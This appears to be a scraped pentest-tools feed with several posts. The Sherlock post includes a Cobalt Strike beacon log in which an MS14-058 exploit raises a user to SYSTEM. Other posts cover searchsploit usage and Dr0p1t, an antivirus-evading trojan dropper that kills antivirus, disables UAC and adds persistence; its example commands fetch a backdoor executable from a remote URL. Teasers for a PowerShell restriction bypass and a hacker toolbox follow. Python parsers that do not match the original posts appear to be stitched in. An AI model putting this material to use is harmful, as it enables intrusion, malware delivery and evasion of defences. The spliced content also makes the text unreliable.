Sherlock – Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities

PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.

Currently looks for:

- MS10-015 : User Mode to Ring (KiTrap0D)
- MS10-092 : Task Scheduler
- MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
- MS13-081 : TrackPopupMenuEx Win32k NULL Page
- MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Font Driver Buffer Overflow
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Secondary Logon Handle

Tested on:

- Windows 7 SP1 32-bit
- Windows 7 SP1 64-bit
- Windows 8 64-bit
- Windows 10 64-bit

Basic Usage:

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...
[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105
[+] established link to parent beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

Download Sherlock
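The Find-AllVulns output above is record-oriented (one Title/MSBulletin/CVEID/Link/VulnStatus block per check), which makes it easy to turn into a patch to-do list for the host. The parser below is an added example, not part of Sherlock; the sample records are copied from the run above and the "Appears Vulnerable" filter is the only status it treats as an outstanding patch.

```python
import re

# Constructed sample in the format Sherlock prints (records taken from the run above).
SAMPLE_OUTPUT = """
Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
"""

FIELD_RE = re.compile(r"^(\w+)\s*:\s*(.*)$")  # matches "Key : value" lines only


def parse_findings(text):
    """Group 'Key : value' lines into records; each 'Title' line starts a new record."""
    records, current = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            continue  # blank lines and beacon chatter are ignored
        key, value = m.group(1), m.group(2).strip()
        if key == "Title" and current:
            records.append(current)
            current = {}
        current[key] = value
    if current:
        records.append(current)
    # Sherlock prints CVE ids without the "CVE-" prefix; normalise them for ticketing/SIEM use.
    for r in records:
        r["cves"] = ["CVE-" + c.strip() for c in r.get("CVEID", "").split(",") if c.strip()]
    return records


def missing_patches(text):
    """Bulletins reported 'Appears Vulnerable': the patches this host still needs."""
    return sorted(r["MSBulletin"] for r in parse_findings(text)
                  if r.get("VulnStatus") == "Appears Vulnerable")
```

Checks reported as "Not supported on 64-bit systems" are kept in the parsed records but never counted as missing, since Sherlock did not evaluate them on that host.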

Link: http://feedproxy.google.com/~r/PentestTools/~3/q7lscN0kyzI/sherlock-tool-to-find-missing-windows.html

Exploit Database – The official Exploit Database Repository

The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away.

This repository is updated daily with the most recently added submissions. Any additional resources can be found in our binary sploits repository.

Included with this repository is the searchsploit utility, which will allow you to search through the exploits using one or more terms. For more information, please see the SearchSploit manual.

root@kali:~# searchsploit -h
  Usage: searchsploit [options] term1 [term2] ... [termN]

==========
 Examples
==========
  searchsploit afd windows local
  searchsploit -t oracle windows
  searchsploit -p 39446

=========
 Options
=========
   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe).
   -e, --exact    [Term]      Perform an EXACT match on exploit title (Default is AND) [Implies "-t"].
   -h, --help                 Show this help screen.
   -j, --json     [Term]      Show result in JSON format.
   -m, --mirror   [EDB-ID]    Mirror (aka copies) an exploit to the current working directory.
   -o, --overflow [Term]      Exploit titles are allowed to overflow their columns.
   -p, --path     [EDB-ID]    Show the full path to an exploit (and also copies the path to the clipboard if possible).
   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path).
   -u, --update               Check for and install any exploitdb package updates (deb or git).
   -w, --www      [Term]      Show URLs to Exploit-DB.com rather than the local path.
   -x, --examine  [EDB-ID]    Examine (aka opens) the exploit using $PAGER.
       --colour               Disable colour highlighting in search results.
       --id                   Display the EDB-ID value rather than local path.
       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
                              Use "-v" (verbose) to try even more combinations

=======
 Notes
=======
 * You can use any number of search terms.
 * Search terms are not case-sensitive (by default), and ordering is irrelevant.
 * Use '-c' if you wish to reduce results by case-sensitive searching.
 * And/Or '-e' if you wish to filter results by using an exact match.
 * Use '-t' to exclude the file's path to filter the search results.
 * Remove false positives (especially when searching using numbers - i.e. versions).
 * When updating from git or displaying help, search terms will be ignored.
root@kali:~#

root@kali:~# searchsploit afd windows local
--------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                   |  Path
                                                                                 | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------- ----------------------------------
Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service                  | ./windows/dos/17133.c
Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066) | ./windows/local/6757.txt
Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)            | ./windows/local/18176.py
Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)   | ./windows/local/21844.rb
Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)   | ./win_x86/local/39446.py
Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)            | ./win_x86-64/local/39525.py
Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)              | ./windows/local/40564.c
--------------------------------------------------------------------------------- ----------------------------------
root@kali:~#

root@kali:~# searchsploit -p 39446
  Exploit: Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
      URL: https://www.exploit-db.com/exploits/39446/
     Path: /usr/share/exploitdb/platforms/win_x86/local/39446.py
Copied EDB-ID 39446's path to the clipboard.
root@kali:~#

SearchSploit requires either "CoreUtils" or "utilities" (e.g. bash, sed, grep, awk, etc.) for the core features to work. The self-updating function requires git, and the Nmap XML option requires xmllint (found in the libxml2-utils package on Debian-based systems).

Download Exploit Database
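The --nmap option works from the service banners Nmap records with -sV, which is also the data a vulnerability-management team reconciles against known issues. The following is an added example, not searchsploit's own code: it pulls product and version out of a constructed Nmap -oX file and builds the query terms you would otherwise type by hand; exactly how searchsploit widens the search under -v is an assumption here.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap -sV -oX output for one host (address and banners are made up).
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.10">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4" extrainfo="protocol 2.0"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.29"/>
      </port>
      <port protocol="tcp" portid="135">
        <state state="filtered"/>
        <service name="msrpc"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="open"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def service_terms(xml_text, verbose=False):
    """Return (address, port, [terms]) for each open port that has a product banner.

    Base term is product + version ('searchsploit OpenSSH 7.4'); verbose=True also
    adds a product-only term, my approximation of what -v "more combinations" does.
    """
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state, svc = port.find("state"), port.find("service")
            if state is None or state.get("state") != "open" or svc is None:
                continue  # closed/filtered ports never reached a service probe
            product = svc.get("product")
            if not product:
                continue  # open port but no banner: nothing to search on
            terms = [(product + " " + svc.get("version", "")).strip()]
            if verbose:
                terms.append(product)
            results.append((addr, int(port.get("portid")), terms))
    return results
```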

Link: http://feedproxy.google.com/~r/PentestTools/~3/5lR5-Tnz96A/exploit-database-official-exploit.html

Dr0p1t-Framework 1.2 – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers? In short, a dropper is a type of trojan that downloads other malware, and Dr0p1t gives you the chance to create a dropper that bypasses most AVs and has some tricks 😉

Features

- Framework works with Windows and Linux
- Downloads an executable on the target system and executes it silently.
- The executable size is small compared to other droppers generated the same way
- Self destruct function so that the dropper will kill and delete itself after finishing its work
- Adding the executable to startup after downloading it
- Adding the executable to task scheduler after downloading it ( UAC not matters )
- Finding and killing the antivirus before running the malware
- Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
- The ability to disable UAC
- When running powershell scripts it can bypass execution policy
- Using UPX to compress the dropper after creating it
- Choose an icon for the dropper after creating it

Screenshots: On Windows / On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

- Python 2 or Python 3. The recommended version for Python 2 is 2.7.x, the recommended version for Python 3 is 3.5.x; don't use 3.6 because it's not supported yet by PyInstaller
- Python library requirements in requirements.txt
- Needed dependencies for Linux: Wine, Python 2.7 on the Wine machine

Note: You must have root access

Installation

If you are on Linux:

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on Windows, download it and then do:

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicode in Windows, which makes coloring possible.

Tested on:

- Kali Linux - SANA
- Ubuntu 14.04-16.04 LTS
- Windows 10/8.1/8

Changelog v1.2

- PyInstaller compiling in Linux using Wine
- PyInstaller compiling in Windows will not use UPX, and that fixes the compiling in Windows
- Added the ability to disable and bypass UAC
- Updated the antivirus list in the antivirus killer
- Added SelfDestruct function so that the dropper will kill and delete itself after finishing its work
- Full framework rewrite and recheck to fix errors and typos, and replacing some libraries to make the size of the final file smaller
- Started working on some SE tricks to fool the user, and there's a lot of good options on the way 😉 Stay Tuned

Contact: Twitter, Facebook

Download Dr0p1t-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/0xBvTJEexbE/dr0p1t-framework-12-framework-that.html

Simple Bypass for PowerShell Constrained Language Mode

We all know that Microsoft has added some nice features to PowerShell v5 to help out the Blue teams: Constrained Language Mode, Deep Scriptblock logging, system wide transcripts and AMSI, to name a few. This blog is not a lesson on each of the features mentioned above; for more information this is a great place …

Link: https://pentestn00b.wordpress.com/2017/03/20/simple-bypass-for-powershell-constrained-language-mode/

PloitKit – The Hacker’s ToolBox

PloitKit is a Python based GUI tool designed as a one-stop shop for all other software. I was facing these kinds of problems when I needed to switch to a different system, or lost my pen-drive: I had to go to Google, search for every tool, download every tool, and so on. So I decided to create a tool in which I just click and click and the tool is there. I have added more than 900+ tools to this tool, but only 400+ are available now, to test whether this tool works; if it works I'll make it available for everyone.

Features

- Auto-Update - No need to come over here and look for a new version every time.
- Better Error Handling - Some tools may cause errors, that's why I added this option.
- Graphical Interface - For just click & click.
- Malware Protection - All tools are downloaded from their original source, so no malware or viruses.
- Multi-Platform - Many tools are designed differently for Mac, Windows & Linux, so I added an option for that. Choose your platform and you're good to go.
- Better organised - Everything is better organised, nothing like searching for everything and all that mess.

I believe that nothing can be perfect, so I added an option to report a tool, or send me suggestions about any new tool I should add.

Usage

git clone https://github.com/rajeshmajumdar/PloitKit.git

Windows:
ploitkit.py

UNIX or Mac:
python ploitkit.py

Download PloitKit

Link: http://feedproxy.google.com/~r/PentestTools/~3/deHue-WTCYs/ploitkit-hackers-toolbox.html